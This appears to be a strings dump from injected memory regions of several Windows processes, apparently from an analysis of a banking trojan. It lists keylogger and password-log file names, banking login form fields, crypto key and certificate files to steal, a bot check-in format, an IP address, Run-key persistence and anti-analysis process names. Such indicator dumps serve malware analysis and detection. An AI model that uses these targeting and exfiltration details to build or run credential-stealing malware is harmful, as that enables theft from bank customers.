HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
ADM!WINUK0FFOO83I6!427963A6
MSCTF.Shared.MAPPING.fffffffe
MSCTF.Shared.MAPPING.ffffffff
MSCTF.Shared.MAPPING.fffffffd
MSCTF.Shared.MUTEX.fffffffe
MSCTF.Shared.MUTEX.ffffffff
C:\Windows\apppatch\rkousid.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

svchost.exe_1732_rwx_003E0000_00056000:

(strings identical to the Explorer.EXE_1440_rwx_03ED0000_00056000 region above)

svchost.exe_1732_rwx_00BE0000_00065000:

.text
`.rdata
@.data
.reloc
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
WINUK0FFOO83I6!WINUK0FFOO83I6!427963A6
MSCTF.Shared.MAPPING.fffffffe
MSCTF.Shared.MAPPING.ffffffff
MSCTF.Shared.MAPPING.fffffffd
MSCTF.Shared.MUTEX.fffffffe
MSCTF.Shared.MUTEX.ffffffff
C:\Windows\apppatch\rkousid.exe
C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

TPAutoConnect.exe_2160_rwx_00390000_00056000:

(strings identical to the Explorer.EXE_1440_rwx_03ED0000_00056000 region above)

TPAutoConnect.exe_2160_rwx_012E0000_00065000:

conhost.exe_2168_rwx_01150000_00056000:

conhost.exe_2168_rwx_014D0000_00065000:

svchost.exe_2560_rwx_005F0000_00056000:

svchost.exe_2560_rwx_00650000_00065000:

conhost.exe_3500_rwx_00370000_00056000:

.text
`.data
.reloc
`.rdata
@.data
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s&ltime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

conhost.exe_3500_rwx_01F40000_00065000:

.text
`.rdata
@.data
.reloc
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s&ltime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
ADM!WINUK0FFOO83I6!427963A6
MSCTF.Shared.MAPPING.fffffffe
MSCTF.Shared.MAPPING.ffffffff
MSCTF.Shared.MAPPING.fffffffd
MSCTF.Shared.MUTEX.fffffffe
MSCTF.Shared.MUTEX.ffffffff
C:\Windows\apppatch\rkousid.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin
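
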